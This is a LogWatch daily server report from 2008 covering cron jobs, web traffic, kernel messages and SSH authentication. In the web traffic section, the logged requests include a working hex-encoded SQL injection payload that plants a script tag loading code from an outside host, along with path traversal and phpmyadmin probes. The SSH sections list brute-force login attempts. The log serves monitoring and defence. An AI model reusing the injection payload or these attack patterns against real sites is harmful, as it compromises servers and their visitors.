[Sysadmin] LogWatch for tempest

root root at tempest.evolt.org
Sat Oct 4 06:25:44 CDT 2008


 ################### LogWatch 5.2.2 (06/23/04) #################### 
       Processing Initiated: Sat Oct  4 06:25:17 2008
       Date Range Processed: yesterday
     Detail Level of Output: 10
          Logfiles for Host: tempest
 ################################################################ 

 --------------------- Cron Begin ------------------------ 

Commands Run:
   User dmah:
      /home/dmah/bin/article_reminder.pl: 1 Time(s)
      /home/dmah/bin/comment_reminder.pl: 1 Time(s)
   User mailman:
      /usr/bin/python -S /home/mailman/lists.evolt.org/cron/checkdbs: 1 Time(s)
      /usr/bin/python -S /home/mailman/lists.evolt.org/cron/disabled: 1 Time(s)
      /usr/bin/python -S /home/mailman/lists.evolt.org/cron/gate_news: 288 Time(s)
      /usr/bin/python -S /home/mailman/lists.evolt.org/cron/nightly_gzip: 1 Time(s)
      /usr/bin/python -S /home/mailman/lists.evolt.org/cron/senddigests: 1 Time(s)
   User root:
         run-parts --report /etc/cron.hourly: 24 Time(s)
        [ -d /var/lib/php4 ] && find /var/lib/php4/ -type f -cmin +$(/usr/lib/php4/maxlifetime) -print0 | xargs -r -0 rm: 48 Time(s)
      /store/host/browsers.evolt.org/mkarchivesize: 1 Time(s)
      /usr/bin/freshclam --quiet -l /var/log/clam-update.log: 1 Time(s)
      /usr/local/bin/planetupdate 1>/dev/null 2>&1: 24 Time(s)
      /usr/sbin/ntpdate -su us.pool.ntp.org us.pool.ntp.org: 1 Time(s)
      /var/qmail/bin/qmailstats 1>/dev/null 2>/dev/null: 1 Time(s)
      if [ -x /usr/bin/vnstat ] && [ `ls /var/lib/vnstat/ | wc -l` -ge 1 ]; then /usr/bin/vnstat -u; fi: 288 Time(s)
      test -x /usr/sbin/anacron || run-parts --report /etc/cron.daily: 1 Time(s)
      test -x /usr/sbin/cron-apt && /usr/sbin/cron-apt: 1 Time(s)
      wget -O - -q http://evolt.org/cron.php: 72 Time(s)
   User www-data:
      [ -x /usr/lib/cgi-bin/awstats.pl -a -f /etc/awstats/awstats.conf -a -r /var/log/apache/access.log ] && /usr/lib/cgi-bin/awstats.pl -config=awstats -update >/dev/null: 144 Time(s)

 ---------------------- Cron End ------------------------- 


 --------------------- EXIM Begin ------------------------ 


--- Messages history ---

3 messages delivered immediately to 3 total recipients

 ---------------------- EXIM End ------------------------- 


 --------------------- httpd Begin ------------------------ 

29.89 MB transfered in 2213 responses  (1xx 0, 2xx 1120, 3xx 586, 4xx 507, 5xx 0) 
 52 Images (0.02 MB),
 8 Documents (0.00 MB),
 1 Archives (0.00 MB),
 1899 Content pages (29.29 MB),
 7 Redirects (0.00 MB),
 60 Program source files (0.11 MB),
 186 Other (0.47 MB) 

Attempts to use 2 known hacks were logged 2 time(s)
  /../../../   by 
          201.26.100.140 1 time(s) 
  phpmyadmin   by 
          65.55.210.31 1 time(s) 

A total of 2 sites probed the server 
  65.55.210.31  
  201.26.100.140  

A total of 127 unidentified 'other' records logged
  GET /cgi-bin/viewcvs.cgi/weo_theme/.cvsignore?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /shaggy/javascript/create_slideshow HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating05.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating06.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/rss10.gif?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?only_with_tag=MAIN&r2=1.25&r1=1.3 HTTP/1.1 with response code(s) 1 200 responses
  GET /webdad/testing/day_scheduler.html, HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/.cvsignore?view=graph&sortby=author&only_with_tag=MAIN HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/Attic/evolt.ico?view=graph&hideattic=0&sortby=date&only_with_tag=MAIN HTTP/1.1 with response code(s) 1 200 responses
  GET /jeff/code/chmod.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /tos.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/.cvsignore?sortby=file&r2=1.2&r1=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /jesteruk HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/donatecube.gif?rev=1.1 HTTP/1.0 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating03.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/square-bullet-categories.gif?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating04.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /node/21534?';DECLARE%20 at S%20CHAR(4000);SET%20 at S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645 with response code(s) 1 404 responses
  HEAD /dshadovi/MM_resources.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?annotate=1.19&only_with_tag=MAIN HTTP/1.1 with response code(s) 1 200 responses
  GET /PHP-Login-System-with-Admin-Features/, make sure your database name and password information is specified correctly in constants.php. If you still can HTTP/1.1 with response code(s) 2 400 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/quotes.png?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /jeff/code/toggle_tablerows.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /xmlrpc.php. HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?view=graph&hideattic=0&sortby=rev&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
  GET /jeff/code/unchecking_radio_buttons.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /jeff/code/rank_select.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/Attic/square-bullet.psd?hideattic=0&sortby=log&view=graph HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/bluecube.gif?rev=1.5 HTTP/1.1 with response code(s) 1 200 responses
  GET /jeff/code/js_cgi_variables/index.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/cubes-5.png?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?hideattic=1&only_with_tag=HEAD&sortdir=down&view=graph HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?r1=1.21&r2=1.22&sortby=log HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/nostar.gif?rev=1.3 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/Attic/evolt-logo.ai?r2=1.2&hideattic=0&sortby=log&sortdir=down&r1=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/mkarchivesize?view=graph&hideattic=0&sortby=date&only_with_tag=MAIN HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?rev=1.2&view=auto&hideattic=0&sortby=date&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?rev=1.2&view=log&hideattic=0&sortby=log&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/cubes-2.png?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /rss/articles.rss HTTP/1.0 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/menu-collapsed.png?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?view=graph&hideattic=0&sortby=log&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/donatecube.gif?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /garrett/site/books/factual HTTP/1.0 with response code(s) 1 404 responses
  - with response code(s) 40 408 responses
  GET /jeff/code/js_url_variables/index.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/star.gif?rev=1.3 HTTP/1.1 with response code(s) 1 200 responses
  GET /mantruc/blog HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?rev=1.2&view=auto&hideattic=0&sortby=log&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/Attic/evolt-logo.ai?hideattic=0&sortby=log&sortdir=down&view=graph HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/redcube.gif?rev=1.5 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/evoltorg.gif?rev=1.3 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating10.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /arijit HTTP/1.0 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/square-bullet.gif?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /node/21795?';DECLARE%20 at S%20CHAR(4000);SET%20 at S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 with response code(s) 1 408 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating09.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/logo_print.gif?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/goldcube.gif?rev=1.9 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/evoltorg.png?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating08.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /mpember/afroapix/website/index.php'. HTTP/1.1 with response code(s) 1 404 responses
  GET /jeff/code/checkbox_check_all.cfm HTTP/1.1 with response code(s) 2 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/square-bullet-default.gif?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?rev=1.2&view=log&hideattic=0&sortby=rev&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/.cvsignore?only_with_tag=MAIN&hideattic=0&sortby=log&sortdir=down HTTP/1.1 with response code(s) 1 200 responses
  GET /soichih HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/greencube.gif?rev=1.5 HTTP/1.1 with response code(s) 1 200 responses
  GET /jeff/code/capture_window/index.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/.cvsignore?annotate=1.1&sortby=file HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?rev=1.2&hideattic=1&only_with_tag=HEAD&sortdir=down&view=auto HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/screenshot.png?rev=1.3 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/Attic/square-bullet.psd?rev=1.1&content-type=text/vnd.viewcvs-markup&hideattic=0&sortby=log HTTP/1.1 with response code(s) 1 200 responses
  GET /turkif HTTP/1.0 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/cubes-4.png?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /burhankhalid/devshed HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/Attic/square-bullet.psd?only_with_tag=MAIN&hideattic=0&sortby=log HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/atom03.gif?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/.cvsignore?view=log&rev=1.2&sortby=file&r1=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating07.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /PHP-Login-System-with-Admin-Features/ll tell you. If you look in constants.php you HTTP/1.1 with response code(s) 2 400 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?r1=1.17&r2=1.18&only_with_tag=MAIN HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/.cvsignore?annotate=1.2&sortby=file HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/.cvsignore?rev=1.2&sortby=file&view=markup HTTP/1.1 with response code(s) 1 200 responses
  GET /signup.cfm HTTP/1.1 with response code(s) 6 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/.cvsignore?rev=1.1&sortby=file&view=markup HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?rev=1.2&view=log&hideattic=0&sortby=author&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?view=graph&hideattic=0&sortby=author&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/Attic/square-bullet.psd?rev=1.2&content-type=text/vnd.viewcvs-markup&hideattic=0&sortby=log HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating02.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/cubes-3.png?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /jeff/code/dhtml_form_rollover/index.cfm HTTP/1.1 with response code(s) 5 404 responses
  GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1 with response code(s) 3 400 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/wiki.png?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?rev=1.2&hideattic=1&only_with_tag=HEAD&sortdir=down&view=log HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/*checkout*/beo_ng/beodl/Attic/mirrors-withdeouk.csv HTTP/1.0 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/.cvsignore?view=log&rev=1.2&sortby=file&r1=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/rss091.gif?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /jeff/code/dhtml_form_rollover/index.cfm HTTP/1.0 with response code(s) 2 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating11.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating12.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?rev=1.2&view=auto&hideattic=0&sortby=author&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/usericon.png?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/cubes-1.png?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/.cvsignore?sortby=file&view=markup HTTP/1.1 with response code(s) 1 200 responses
  GET /webshot HTTP/1.1 with response code(s) 1 404 responses
  GET /dshadovi/cf_columnlist/cf_columnlist_example.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?rev=1.2&view=log&hideattic=0&sortby=date&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/favicon.ico?view=graph&hideattic=0&sortby=date&only_with_tag=MAIN HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?rev=1.2&view=auto&hideattic=0&sortby=rev&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/cubes-0.png?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /jeff/code/form_to_window/index.cfm HTTP/1.1 with response code(s) 4 404 responses
  GET /dshadovi/MM_resources.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /jeff/code/select_reset.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/beo_ng/CHANGELOG?view=graph&hideattic=0&sortby=date&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
  GET /PHP-Login-System-with-Admin-Features/re having, it works when you register but just not on the first time you load the page? It gives you that error. Look at register() function in session.php, that HTTP/1.1 with response code(s) 1 400 responses
  GET /djc/stdio/index.cfm/daddy/show/mommy/56 HTTP/1.1 with response code(s) 1 404 responses
  GET /jeff/code/js_cookie_vars/index.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/*checkout*/beo_ng/beodl/Attic/mirrors.csv HTTP/1.0 with response code(s) 1 200 responses
  GET /jeff/code/imagemap_rollover/index.cfm HTTP/1.1 with response code(s) 1 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/rss092.gif?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/rss20.gif?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/workcube.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses
  GET /marlene/services/netscape-216 HTTP/1.1 with response code(s) 1 404 responses
  GET /garrett/site/books/factual HTTP/1.1 with response code(s) 2 404 responses
  GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating01.gif?rev=1.2 HTTP/1.1 with response code(s) 1 200 responses

A total of 12 ROBOTS were logged 
      Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) 4 time(s) 
      Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 13 time(s) 
      Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler at dotnetdotcom.org) 1 time(s) 
      Gigabot/3.0 (http://www.gigablast.com/spider.html) 2 time(s) 
      Biglotron-3.01 (robot at too.org) 1 time(s) 
      msnbot-media/1.0 (+http://search.msn.com/msnbot.htm) 4 time(s) 
      msnbot-media/1.1 (+http://search.msn.com/msnbot.htm) 3 time(s) 
      larbin_2.6.3 (larbin2.6.3 at unspecified.mail) 1 time(s) 
      Grub/2.0 (Grub.org crawler; http://www.grub.org/; bot at grub.org) 1 time(s) 
      msnbot/1.1 (+http://search.msn.com/msnbot.htm) 47 time(s) 
      Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html) 2 time(s) 
      Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+) 1 time(s) 

 ---------------------- httpd End ------------------------- 


 --------------------- Kernel Begin ------------------------ 


1 Time(s): UDP: bad checksum. From 12.96.160.106:53 to 67.19.100.194:22874 ulen 116
1 Time(s): UDP: short packet: 12.96.160.115:53 180/164 to 67.19.100.194:64715
1 Time(s): UDP: short packet: 12.96.160.115:53 209/193 to 67.19.100.194:47015
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:41570
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:42946
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:44412
1 Time(s): UDP: short packet: 12.96.160.115:53 244/228 to 67.19.100.194:64715
1 Time(s): UDP: short packet: 12.96.160.115:53 272/256 to 67.19.100.194:64715
1 Time(s): UDP: short packet: 12.96.160.115:53 273/257 to 67.19.100.194:64715
1 Time(s): UDP: short packet: 12.96.160.115:53 279/263 to 67.19.100.194:47720
1 Time(s): UDP: short packet: 12.96.160.115:53 305/289 to 67.19.100.194:51542
1 Time(s): UDP: short packet: 12.96.160.115:53 315/299 to 67.19.100.194:51506
1 Time(s): UDP: short packet: 12.96.160.115:53 345/329 to 67.19.100.194:36607
1 Time(s): UDP: short packet: 12.96.160.115:53 345/329 to 67.19.100.194:43609
1 Time(s): UDP: short packet: 12.96.160.115:53 345/329 to 67.19.100.194:45652
1 Time(s): UDP: short packet: 12.96.160.115:53 345/329 to 67.19.100.194:47331
1 Time(s): UDP: short packet: 12.96.160.115:53 345/329 to 67.19.100.194:59049
1 Time(s): UDP: short packet: 12.96.160.115:53 414/398 to 67.19.100.194:44201
1 Time(s): UDP: short packet: 12.96.160.115:53 414/398 to 67.19.100.194:45769
1 Time(s): UDP: short packet: 12.96.160.115:53 503/487 to 67.19.100.194:35338
1 Time(s): UDP: short packet: 12.96.160.115:53 530/514 to 67.19.100.194:50541
1 Time(s): device eth0 entered promiscuous mode
1 Time(s): device eth0 left promiscuous mode

 ---------------------- Kernel End ------------------------- 


 --------------------- pam_unix Begin ------------------------ 

cron:
   Sessions Opened:
      root: 462 Time(s)
      mailman: 292 Time(s)
      www-data: 144 Time(s)
      dmah: 2 Time(s)

sshd:
   Authentication Failures:
      unknown (58.223.242.246): 25 Time(s)
      unknown (189.43.21.244): 20 Time(s)
      unknown (211.94.209.19): 7 Time(s)
      unknown (89-96-108-166.ip12.fastwebnet.it): 2 Time(s)
   Invalid Users:
      Unknown Account: 54 Time(s)

su:
   Sessions Opened:
      (uid=0) -> nobody: 1 Time(s)


 ---------------------- pam_unix End ------------------------- 


 --------------------- sendmail Begin ------------------------ 


ERROR: Could not open /etc/mail/local-host-names

ERROR: Could not open /etc/mail/access


Message Size Distribution:
Range          # Msgs       KBytes
0 - 10k             0            0
10k - 20k           0            0
20k - 50k           0            0
50k - 100k          0            0
100k - 500k         0            0
500k - 1Mb          0            0
1Mb - 2Mb           0            0
2Mb - 5Mb           0            0
5Mb - 10Mb          0            0
10Mb+               0            0
----------------------------------
TOTAL               0            0

 ---------------------- sendmail End ------------------------- 


 --------------------- SSHD Begin ------------------------ 


Couldn't resolve these IPs:
   hn.kd.ny.adsl: 26 Time(s)
   ip46.plugin.com.br: 106 Time(s)

Didn't receive an ident from these IPs:
   200.75.13.38: 5 Time(s)
   61.152.216.243: 5 Time(s)
   80.78.64.168: 5 Time(s)
   84.77.255.217: 5 Time(s)
   ip46.plugin.com.br (189.14.103.46): 5 Time(s)
   kilo093.server4you.de (85.25.10.10): 5 Time(s)

Failed logins from these:
   aaron/password from 80.78.64.168: 2 Time(s)
   admin/password from 200.75.13.38: 5 Time(s)
   admin/password from 80.78.64.168: 2 Time(s)
   alias/password from 61.152.216.243: 2 Time(s)
   andrew/password from 189.14.103.46: 5 Time(s)
   apple/password from 189.14.103.46: 5 Time(s)
   brian/password from 189.14.103.46: 5 Time(s)
   cjohnson/password from 189.14.103.46: 5 Time(s)
   export/password from 189.14.103.46: 5 Time(s)
   gast/password from 189.14.103.46: 5 Time(s)
   gt05/password from 80.78.64.168: 2 Time(s)
   guest/password from 200.75.13.38: 5 Time(s)
   hostmaster/keyboard-interactive/pam from 211.94.209.19: 7 Time(s)
   hostmaster/keyboard-interactive/pam from 58.223.242.246: 10 Time(s)
   hostmaster/keyboard-interactive/pam from 89.96.108.166: 2 Time(s)
   magazine/password from 189.14.103.46: 5 Time(s)
   newsroom/password from 189.14.103.46: 5 Time(s)
   photo/password from 189.14.103.46: 5 Time(s)
   recruit/password from 61.152.216.243: 2 Time(s)
   research/password from 189.14.103.46: 5 Time(s)
   root/password from 125.46.36.89: 26 Time(s)
   root/password from 189.14.103.46: 56 Time(s)
   root/password from 200.75.13.38: 5 Time(s)
   root/password from 80.78.64.168: 6 Time(s)
   sales/password from 61.152.216.243: 4 Time(s)
   staff/password from 61.152.216.243: 4 Time(s)
   stephanie/password from 80.78.64.168: 1 Time(s)
   stream/password from 85.25.10.10: 81 Time(s)
   stud/password from 80.78.64.168: 2 Time(s)
   test/password from 200.75.13.38: 5 Time(s)
   trash/password from 80.78.64.168: 2 Time(s)
   user/keyboard-interactive/pam from 189.43.21.244: 20 Time(s)
   user/keyboard-interactive/pam from 58.223.242.246: 15 Time(s)
   william/password from 80.78.64.168: 2 Time(s)

Illegal users from these:
   aaron/none from 80.78.64.168: 2 Time(s)
   aaron/password from 80.78.64.168: 2 Time(s)
   admin/none from 200.75.13.38: 5 Time(s)
   admin/none from 80.78.64.168: 2 Time(s)
   admin/password from 200.75.13.38: 5 Time(s)
   admin/password from 80.78.64.168: 2 Time(s)
   alias/password from 61.152.216.243: 2 Time(s)
   andrew/none from 189.14.103.46: 5 Time(s)
   andrew/password from 189.14.103.46: 5 Time(s)
   apple/none from 189.14.103.46: 5 Time(s)
   apple/password from 189.14.103.46: 5 Time(s)
   brian/none from 189.14.103.46: 5 Time(s)
   brian/password from 189.14.103.46: 5 Time(s)
   cjohnson/none from 189.14.103.46: 5 Time(s)
   cjohnson/password from 189.14.103.46: 5 Time(s)
   export/none from 189.14.103.46: 5 Time(s)
   export/password from 189.14.103.46: 5 Time(s)
   gast/none from 189.14.103.46: 5 Time(s)
   gast/password from 189.14.103.46: 5 Time(s)
   gt05/none from 80.78.64.168: 2 Time(s)
   gt05/password from 80.78.64.168: 2 Time(s)
   guest/none from 200.75.13.38: 5 Time(s)
   guest/password from 200.75.13.38: 5 Time(s)
   hostmaster/keyboard-interactive/pam from 211.94.209.19: 7 Time(s)
   hostmaster/keyboard-interactive/pam from 58.223.242.246: 10 Time(s)
   hostmaster/keyboard-interactive/pam from 89.96.108.166: 2 Time(s)
   hostmaster/none from 211.94.209.19: 7 Time(s)
   hostmaster/none from 58.223.242.246: 10 Time(s)
   hostmaster/none from 89.96.108.166: 2 Time(s)
   magazine/none from 189.14.103.46: 5 Time(s)
   magazine/password from 189.14.103.46: 5 Time(s)
   newsroom/none from 189.14.103.46: 5 Time(s)
   newsroom/password from 189.14.103.46: 5 Time(s)
   photo/none from 189.14.103.46: 5 Time(s)
   photo/password from 189.14.103.46: 5 Time(s)
   recruit/none from 61.152.216.243: 2 Time(s)
   recruit/password from 61.152.216.243: 2 Time(s)
   research/none from 189.14.103.46: 5 Time(s)
   research/password from 189.14.103.46: 5 Time(s)
   sales/none from 61.152.216.243: 4 Time(s)
   sales/password from 61.152.216.243: 4 Time(s)
   staff/none from 61.152.216.243: 4 Time(s)
   staff/password from 61.152.216.243: 4 Time(s)
   stephanie/none from 80.78.64.168: 1 Time(s)
   stephanie/password from 80.78.64.168: 1 Time(s)
   stream/none from 85.25.10.10: 81 Time(s)
   stream/password from 85.25.10.10: 81 Time(s)
   stud/none from 80.78.64.168: 2 Time(s)
   stud/password from 80.78.64.168: 2 Time(s)
   test/none from 200.75.13.38: 5 Time(s)
